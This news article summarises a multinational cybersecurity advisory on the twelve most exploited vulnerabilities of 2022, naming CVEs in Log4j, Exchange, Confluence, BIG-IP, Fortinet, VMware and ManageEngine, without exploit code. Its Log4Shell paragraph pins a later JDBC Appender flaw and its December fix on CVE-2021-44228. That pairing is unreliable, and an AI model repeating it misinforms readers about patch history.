Top 12 Most Routinely Exploited vulnerabilities in 2022

Cybersecurity security agencies from the United States, United Kingdom, Australia, Canada and New Zealand have published the top 12 routinely exploited vulnerabilities in 2022.

In 2022, bad actors more frequently exploited older software vulnerabilities on unpatched, internet-facing systems, as compared to recently disclosed vulnerabilities.

Report Summary

The new CISA joint Cybersecurity Advisory (CSA) outlines the 12 most exploited CVEs that impact Apache (Log4Shell), Atlassian, F5 Networks (BIG-IP), Fortinet, VMware, Zoho ManageEngine, Microsoft Exchange (ProxyShell) and other Microsoft products.

“Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors,” the report added.

The following cybersecurity agencies contributed to the report (AA23-215A), published August 4, 2023:

  • United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)
  • Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
  • Canada: Canadian Centre for Cyber Security (CCCS)
  • New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
  • United Kingdom: National Cyber Security Centre (NCSC-UK).


In late December 2021, The Apache Software Foundation released a security update to address another Log4j vulnerability (CVE-2021- 44228), aka “Log4Shell”, where Log4j2 is vulnerable to remote code execution (RCE) via JDBC Appender when an attacker controls a configuration file.

It was later found that the fix for CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. Therefore, another Apache update, CVE-2021-45046, was released that fixed the issue for non-default configurations.


In August, 2021, cyberattackers were observed scanning and exploiting ProxyShell vulnerabilities on unpatched Microsoft Exchange servers.

The ProxyShell vulnerabilities (CVE-2021-34473CVE-2021-34523CVE-2021-31207) were patched by Microsoft as part of May 2021 patch updates. One of those, CVE-2021-34473, could result in remote code execution (RCE).

Other exploited CVEs

Moreover, the advisory includes the following additional eight (8) most exploited CVEs:

  • CVE-2021-26084: Atlassian Confluence Server and Data Center (Arbitrary Code Execution)
  • CVE-2022-26134: Atlassian Confluence Server and Data Center (RCE)
  • CVE-2022-1388: F5 Networks BIG-IP (Missing Authentication)
  • CVE-2018-13379: Fortinet FortiOS and FortiProxy (SSL VPN credential exposure)
  • CVE-2022-30190: Microsoft Multiple Products (RCE)
  • CVE-2022-22954: VMware Workspace ONE Access and Identity Manager (RCE)
  • CVE-2022-22960: VMware Workspace ONE Access, Identity Manager, and vRealize Automation (Improper Privilege Management)
  • CVE-2021-40539: Zoho ManageEngine ADSelfService Plus (RCE).

Readers can check out more details on these vulnerabilities from our previous articles published at links below.

Related Articles